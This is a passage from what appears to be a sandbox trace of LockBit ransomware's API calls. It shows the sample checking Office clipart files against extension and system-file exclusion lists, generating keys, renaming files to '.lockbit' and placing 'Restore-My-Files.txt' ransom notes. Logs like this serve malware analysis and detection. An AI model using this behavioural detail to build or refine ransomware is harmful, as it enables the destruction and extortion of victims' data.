Office\\CLIPART\\PUB60COR\\PE02293_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.600] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.600] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.601] free (_Block=0x1fa2ed8) [0167.601] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.601] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.601] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x406e600, ftCreationTime.dwHighDateTime=0x1bf3a32, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x406e600, ftLastWriteTime.dwHighDateTime=0x1bf3a32, nFileSizeHigh=0x0, nFileSizeLow=0x5328, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02296_.WMF", cAlternateFileName="")) returned 1 [0167.601] lstrcmpiW (lpString1=".", lpString2="PE02296_.WMF") returned -1 [0167.601] lstrcmpiW (lpString1="..", lpString2="PE02296_.WMF") returned -1 [0167.601] PathFindExtensionW (pszPath="PE02296_.WMF") returned=".WMF" [0167.601] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.602] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.603] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.603] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02296_.WMF") returned 1 [0167.603] lstrcmpiW (lpString1="ntldr", lpString2="PE02296_.WMF") returned -1 [0167.603] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02296_.WMF") returned -1 [0167.603] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02296_.WMF") returned -1 [0167.604] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02296_.WMF") returned -1 [0167.604] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02296_.WMF") returned 1 [0167.604] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02296_.WMF") returned -1 [0167.604] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.604] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF") returned=".WMF" [0167.604] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.604] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.604] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.605] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.605] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF.lockbit") returned 72 [0167.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02296_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.606] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.606] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.606] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=21288) returned 1 [0167.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.608] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.619] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.619] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.619] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.621] free (_Block=0x1fa2ed8) [0167.621] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.621] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.621] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.621] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf911f00, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf911f00, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02369_.WMF", cAlternateFileName="")) returned 1 [0167.621] lstrcmpiW (lpString1=".", lpString2="PE02369_.WMF") returned -1 [0167.621] lstrcmpiW (lpString1="..", lpString2="PE02369_.WMF") returned -1 [0167.621] PathFindExtensionW (pszPath="PE02369_.WMF") returned=".WMF" [0167.621] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.621] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.621] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.622] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.622] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02369_.WMF") returned 1 [0167.623] lstrcmpiW (lpString1="ntldr", lpString2="PE02369_.WMF") returned -1 [0167.623] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02369_.WMF") returned -1 [0167.623] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02369_.WMF") returned -1 [0167.623] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02369_.WMF") returned -1 [0167.623] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02369_.WMF") returned 1 [0167.623] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02369_.WMF") returned -1 [0167.623] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.623] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF") returned=".WMF" [0167.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.623] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.625] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.625] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.626] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.626] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF.lockbit") returned 72 [0167.626] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02369_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.627] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.627] malloc (_Size=0x40068) returned 0x3df0008 [0167.627] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2240) returned 1 [0167.627] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.628] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.633] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.633] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.634] free (_Block=0x1fa2ed8) [0167.634] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.634] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.634] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa494d400, ftCreationTime.dwHighDateTime=0x1bd4af2, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa494d400, ftLastWriteTime.dwHighDateTime=0x1bd4af2, nFileSizeHigh=0x0, nFileSizeLow=0x39f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02522_.WMF", cAlternateFileName="")) returned 1 [0167.634] lstrcmpiW (lpString1=".", lpString2="PE02522_.WMF") returned -1 [0167.634] lstrcmpiW (lpString1="..", lpString2="PE02522_.WMF") returned -1 [0167.634] PathFindExtensionW (pszPath="PE02522_.WMF") returned=".WMF" [0167.634] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.634] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.635] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.635] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02522_.WMF") returned 1 [0167.636] lstrcmpiW (lpString1="ntldr", lpString2="PE02522_.WMF") returned -1 [0167.636] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02522_.WMF") returned -1 [0167.636] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02522_.WMF") returned -1 [0167.636] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02522_.WMF") returned -1 [0167.636] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02522_.WMF") returned 1 [0167.636] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02522_.WMF") returned -1 [0167.636] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.636] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF") returned=".WMF" [0167.636] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".zip", lpString2=".WMF") 